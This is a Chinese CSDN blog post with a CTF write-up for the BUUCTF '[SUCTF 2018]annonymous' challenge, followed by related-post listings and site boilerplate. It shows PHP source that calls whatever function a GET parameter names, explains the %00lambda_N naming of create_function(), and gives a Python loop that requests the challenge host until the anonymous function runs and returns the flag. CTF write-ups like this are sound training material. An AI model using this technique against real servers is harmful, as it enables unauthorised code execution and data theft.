BUUCTF--[SUCTF 2018]annonymous

最新推荐文章于 2022-05-27 15:29:57 发布
最新推荐文章于 2022-05-27 15:29:57 发布
阅读量261 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119183917
版权

进入页面后给出一段代码

 <?php

$MY = create_function("","die(`cat flag.php`);");
$hash = bin2hex(openssl_random_pseudo_bytes(32));
eval("function SUCTF_$hash(){"
    ."global \$MY;"
    ."\$MY();"
    ."}");
if(isset($_GET['func_name'])){
    $_GET["func_name"]();
    die();
}
show_source(__FILE__);

这里的主要考点是$MY = create_function("","die(`cat flag.php`);");    匿名函数详解
创建一个匿名函数,函数会执行cat flag.php
create_function()函数在创建之后会生成一个函数名为:%00lambda_%d
%d的数字会逐步递增

方法一:

使用BurpSuite来实现历遍

方法二:

使用脚本通过大量的请求来迫使Pre-fork模式启动
Apache启动新的线程,这样这里的%d会刷新为1,就可以预测了

import requests
while True:
    r=requests.get('http://83c124c7-8870-4747-a055-03f0e50b8635.node4.buuoj.cn/?func_name=%00lambda_1')
    if 'flag' in r.text:
        print(r.text)
        break

 

 

Uzero.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buu-[SUCTF 2018]annonymous
qaq517384的博客
10-25 226
打开环境就是源码 <?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($_GET['func_name'])){ $_GET["func_name"]();
KH-map:王国大厅领土地图
05-23
它提供了一个平台,让用户(如annonymous、admin等不同角色的用户)能够探索和管理虚拟领土。通过选择“KH”(即王国大厅),用户可以加载地图,并进一步通过输入区域编号来导航到特定区域,这有助于用户了解每个...
BUUCTF:[SUCTF 2018]annonymous
末初的CSDN博客
03-31 1258
[SUCTF 2018]annonymous <?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();"...
[SUCTF 2018]annonymous
cjdgg的博客
05-13 839
[SUCTF 2018]annonymous 这题代码很少,就这几行 首先创建了一个匿名函数,会输出flag 接着openssl_random_pseudo_bytes(32)生成一个随机数,然后将其转成了十六进制,将其赋值给$hash 接着SUCTF_和hash拼接成一个新的函数名,函数会执行上面构造的匿名函数 所以,要想获得flag就只有两种办法,直接执行匿名函数,或者执行SUCTF_和hash拼接成的新函数 下面的func_name可以传一个函数名进去并执行该函数 这题最初想着直接传$MY进去看能
meanOs:平均值操作系统-第一个分散的,人工智能的MEAN.js堆栈操作系统。 Mean OS是唯一使用P2P网络和一组非标准浏览器内部传递机制匿名托管的操作系统。 Mean OS自豪地支持Brave和Tor,免费!
02-02
**MEAN.js堆栈介绍** MEAN.js是一个全栈JavaScript开发框架,用于构建动态Web应用程序。这个名称"MEAN"代表了四个主要技术组件:MongoDB(一个NoSQL数据库)、Express.js(一个轻量级的Web应用框架)、AngularJS...
AnonymousChat:匿名聊天
06-11
#AnonymousChat 基于网络的匿名聊天(HTML5 + Java) 由 ProjectM, HeXA (Yunjae Lee & Injoong Jeong) 开发##Dependent Java Websockets ##联系 mu29(InJung Chung) :
BUUCTF--[SUCTF 2018]MultiSQL
qq_46263951的博客
07-28 372
进入之后是这样的页面,我们先来注册一个帐号 查看用户信息 在?id=后存在一个sql盲注,我们来尝试一下?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入,2异或0还是为2 经过fuzz测试后发现这里过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句select '<?php eval($_POST[.
SUCTF 2018——Anonymous(php匿名函数 \x00lambda_)
weixin_30810583的博客
10-19 234
题目地址:http://45.76.173.177:23334/ 1 <?php 2 $MY = create_function("","die(`cat flag.php`);"); 3 $hash = bin2hex(openssl_random_pseudo_bytes(32)); 4 eval("function SUCTF_$hash(...
[SUCTF 2018]annonymous 真的是匿名函数么
qq_54929891的博客
05-27 431
<?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($_GET['func_name'])){ $_GET["func_name"](); die(); .
[SUCTF 2018]annonymous creat_function匿名函数~~
a3320315的博客
02-13 939
源码 <?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($...
BUUCTF(12_1-12_5)
qq_52988816的博客
12-08 761
//最近一直在准备四级所以鸽了几天 [GXYCTF2019]StrongestMind 让计算数字,计算一千次给flag 我们需要写一个脚本 import re import requests from time import sleep def count(): s = requests.session() url = 'http://8699ffc6-ce00-43ea-b361-81b36d756cf2.node4.buuoj.cn:81/' match = re.com
BUUCTF:[SUCTF 2018]MultiSQL
末初的CSDN博客
04-01 2317
BUUCTF:[SUCTF 2018]MultiSQL 两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell 二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息 ?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入 ...
BUU刷题记录——4
weixin_43610673的博客
08-31 1696
[HarekazeCTF2019]Avatar Uploader 1 finfo_file用来判断上传图片类型,getimagesize可以判断文件像素大小,并且再进行一次类型判断。 finfo_file函数应该是直接打开文件,来获取文件类型。而getimagesize函数是通过图片尺寸数组中第三个元素是否为int型的3来判断的。 finfo_file 可以识别 png 图片( 十六进制下 )的第一行,而 getimagesize 不可以。 所以我们只要保持png头就可以,将他的相符判断
[SUCTF 2018]HateIT CFB重放攻击~~
a3320315的博客
02-17 1436
题目介绍 首先是扫目录得到.git源码泄露,我们用Git_Extract工具下载下来,有几个php文件和一个php的opcode,但是php文件都是经过so拓展加密,由于不会逆向,只能直接看着wp复现了,直接把师傅逆向好的代码拿来复现~~ index.php <?php if(!isset($_SESSION)) { session_start(); ...
BUUCTF:[SUCTF2018]followme
末初的CSDN博客
11-12 1827
https://buuoj.cn/challenges#[SUCTF2018]followme 导出HTTP,这里大部分文件内容显示貌似再爆破admin密码 有点多,尝试整个文件夹找一下相关关键字,例如CTF、flag之类的 grep -r 'CTF' ./new/ flag{password_is_not_weak} ...
BUUCTF:[HBNIS2018]低个头
末初的CSDN博客
04-07 1187
题目名字有意思,很有灵性2333333~ keyboard cipher flag{CTF}
[SUCTF 2018]GetShell
怪味巧克力的博客
07-12 1514
0x01 进入题目 有一个上传页面 那看来就是要上传shell,然后来查看flag了。看一下页面给的代码 if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal char")

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值